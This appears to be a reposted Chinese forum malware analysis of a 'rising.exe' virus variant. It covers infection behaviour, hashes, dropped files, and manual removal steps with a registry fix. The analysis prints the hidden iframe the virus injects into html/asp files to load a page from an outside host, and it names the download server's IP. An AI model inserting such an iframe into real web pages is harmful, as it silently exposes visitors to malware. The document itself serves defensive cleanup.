今天发现此种病毒求助者见多 收到样本后 利马测试了一下
该病毒就是前些日子流行的 修改系统时间的病毒之变种
此次变种可谓是集N种破坏性病毒之大成了
主要破坏功能有:1.感染exe 并使得被感染的exe的公司等属性变为 番茄花园
2.感染html asp 等文件 插入恶意代码
3.通过双击磁盘启动
4.下载木马,盗取网游帐号
5.修改注册表 使系统无法显示隐藏文件
6.通过hook API 函数 导致任务管理器中 无法看见其进程
分析报告如下:
File: rising.exe
Size: 64775 bytes
File Version: 1.00
MD5: 86311B37D938BB35645E7B092014DD63
SHA1: 47C324A5A691DD31DC0410E51ADBD35065E6C7C3
CRC32: 88ABBD9B
rising.exe 运行后 首先释放一个rising.eve的文件 然后由rising.exe启动他
之后 释放139CA82A.EXE 139CA82A.dll(随机的8个数字字母组合成的文件名)到系统文件夹
注册服务139CA82A.EXE
139CA82A.EXE控制winlogon进程 使得139CA82A.dll插入几乎所有进程
释放rising.exe 和autorun.inf 到每个分区 使得双击磁盘启动
感染 除系统分区外的exe文件 使得其公司名全变为 番茄花园
感染 html asp 等文件 在其后面插入代码
<iframe src="http://web.yulett.cn/count.htm" width="0" height="0" frameborder="0"></iframe>
修改系统时间 随机把年份往前调 月,日不变
修改 HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/SHOWALL/CheckedValue:
值为 0x00000000
导致无法显示临时文件
rising.exe 还会hook 多个 API函数 使其进程在任务管理器中隐藏
使用Explorer.exe连接网络 61.152.92.98:80下载木马
下载的木马一般为K117815XXXXX.exe
XXXXX代表随机
到系统文件夹
由于 每台机器上下载的木马的名称不同 但最后结果相同 所以中间释放的过程省略
最后 这些木马运行后分别释放了如下文件
C:/WINDOWS/system32/buchehuo.exe(创建了服务inetsvr)
C:/WINDOWS/system32/cmdbs.dll
C:/WINDOWS/cmdbs.exe
C:/WINDOWS/system32/Kvsc3.dll
C:/WINDOWS/Kvsc3.exe
C:/WINDOWS/system32/mppds.dll
C:/WINDOWS/mppds.exe
C:/WINDOWS/system32/msccrt.dll
C:/WINDOWS/msccrt.exe
C:/WINDOWS/system32/winform.dll
C:/WINDOWS/winform.exe
C:/WINDOWS/system32/winsock.exe
临时文件夹下 释放upxdnd.exe和upxdnd.dll
解决办法:
安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)
首先把系统日期 改回来
然后打开sreng
启动项目 注册表 删除如下项目
<upxdnd><C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/upxdnd.exe> []
<msccrt><C:/WINDOWS/msccrt.exe> []
<cmdbs><C:/WINDOWS/cmdbs.exe> []
<mppds><C:/WINDOWS/mppds.exe> []
<Kvsc3><C:/WINDOWS/Kvsc3.exe> []
<winform><C:/WINDOWS/winform.exe> []
“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
139CA82A / 139CA82A
Wireless Zero Conflguration / inetsvr
把下面的 代码拷入记事本中然后另存为1.reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/SHOWALL]
"RegPath"="Software//Microsoft//Windows//CurrentVersion//Explorer//Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
双击1.reg把这个注册表项导入
然后双击我的电脑-工具-文件夹选项-查看-显示所有文件和文件夹,把“隐藏受保护的系统文件”的勾去掉。
右键 点击C盘 点击右键菜单中的“打开”打开C盘 (千万不要双击)(如图)
删除 如下文件
C:/rising.exe
C:/autorun.inf
C:/WINDOWS/system32/buchehuo.exe
C:/WINDOWS/system32/cmdbs.dll
C:/WINDOWS/cmdbs.exe
C:/WINDOWS/system32/Kvsc3.dll
C:/WINDOWS/Kvsc3.exe
C:/WINDOWS/system32/mppds.dll
C:/WINDOWS/mppds.exe
C:/WINDOWS/system32/msccrt.dll
C:/WINDOWS/msccrt.exe
C:/WINDOWS/system32/winform.dll
C:/WINDOWS/winform.exe
C:/WINDOWS/system32/winsock.exe
C:/WINDOWS/unspapik.txt
C:/WINDOWS/wiasevct.txt
C:/WINDOWS/wiasvctr.txt
C:/WINDOWS/ganran.txt
C:/WINDOWS/system32/139CA82A.DLL(随机的8个数字字母组合成的文件名)
C:/WINDOWS/system32/139CA82A.EXE(随机的8个数字字母组合成的文件名)
C:/WINDOWS/system32/K117815XXXXX.exe(XXXXX代表随机数字)
清空C:/Documents and Settings/用户名/Local Settings/Temp
右键 点击分别打开系统分区以外的分区 还是点击右键菜单中的“打开” (千万不要双击)
删除每个分区下面的autorun.inf和rising.exe文件
最后使用专杀 全盘杀毒
下载地址
http://free.ys168.com/?newcenturysun 我的网盘
威金熊猫番茄专杀 下面的威金熊猫通用终结器
声明 此专杀 只是修复exe文件 而不针对 rising.exe文件 以及他们下载的木马 所以必须在彻底清除了 rising.exe 以及 所有木马后在安全模式下使用
sreng下载地址
http://www.kztechs.com/sreng/download.html
被感染的exe文件 的属性
下载的一些木马
 |
来自于:http://forum.ikaka.com/topic.asp?board=28&artid=8305774
<script type="text/javascript"><!--
google_ad_client = "pub-6025846835405125";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_ad_channel = "";
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
